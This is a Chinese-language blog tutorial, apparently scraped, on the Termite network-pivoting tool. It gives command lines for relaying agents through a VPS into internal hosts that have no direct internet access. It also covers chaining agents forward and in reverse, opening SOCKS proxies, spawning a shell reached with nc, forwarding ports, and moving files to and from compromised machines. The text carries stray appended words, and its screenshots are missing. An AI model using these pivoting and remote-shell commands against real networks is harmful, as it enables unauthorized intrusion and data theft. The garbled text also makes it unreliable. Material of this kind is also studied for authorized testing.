【代理篇】內網穿透利器——Termite

0x01 概述

一、工具介紹

Termite是一款內網穿透利器,分爲管理端admin和代理端agent。它支持多平臺、跳板機間正反向級聯、內置shell管理等。shell

Admin功能參數工具

 

Agent功能參數spa

 

 Admin鏈接agent後的功能參數3d

 

 

另附官方使用說明:http://rootkiter.com/Termite/README.txt代理

 

0x02 不一樣場景中的使用

一、目標在公網

 

使用:code

1)目標A:agent_win32.exe -l 88882)PC:admin_win32.exe -c 目標ip -p 8888

效果:blog

 

二、目標在內網(能出網)

 

使用:vps

1)在vps運行:agent_win32.exe -l 88882)在本身機器運行:admin_win32.exe -c vps_ip -p 88883)在目標機器運行:agent_win32.exe -c vps_ip -p 8888

效果:ip

 

三、目標B在內網(不出網,通出網機器A)

 

(1)agent間正向鏈接get

使用:

a.在vps運行:agent_win32.exe -l 8888

b.在PC運行:admin_win32.exe -c vps_ip -p 8888

c.在出網機器A運行:agent_win32.exe -c vps_ip -p 8888

d.在目標B運行:agent_win32.exe -l 9000

e.在PC運行:goto A_id → connect B_ip 9000

效果:

 

(2)agent間反向鏈接

說明:

a.在vps運行:agent_win32.exe -l 8888

b.在PC運行:admin_win32.exe -c vps_ip -p 8888

c.在出網機器A運行:agent_win32.exe -c vps_ip -p 8888

d.在PC運行:goto A_id -> listen 9000

e.在目標B運行:agent_win32.exe -c A_ip -p 9000

效果:

 

0x03 經常使用功能

一、socks代理

使用:

1goto 對應id
(2)socks 1080

效果:

 

  

 二、shell管理

使用:

(1)shell 4444
(2)nc -v 127.0.0.1 4444

效果:

 

三、端口轉發

使用:

lcxtran 本地端口 目標ip 目標端口

效果:

 

四、上傳下載文件

使用:

upfile 本地文件路徑 目標路徑

downfile 目標文件路徑 本地存放路徑

效果:

 

 

 

 

相關文章
相關標籤/搜索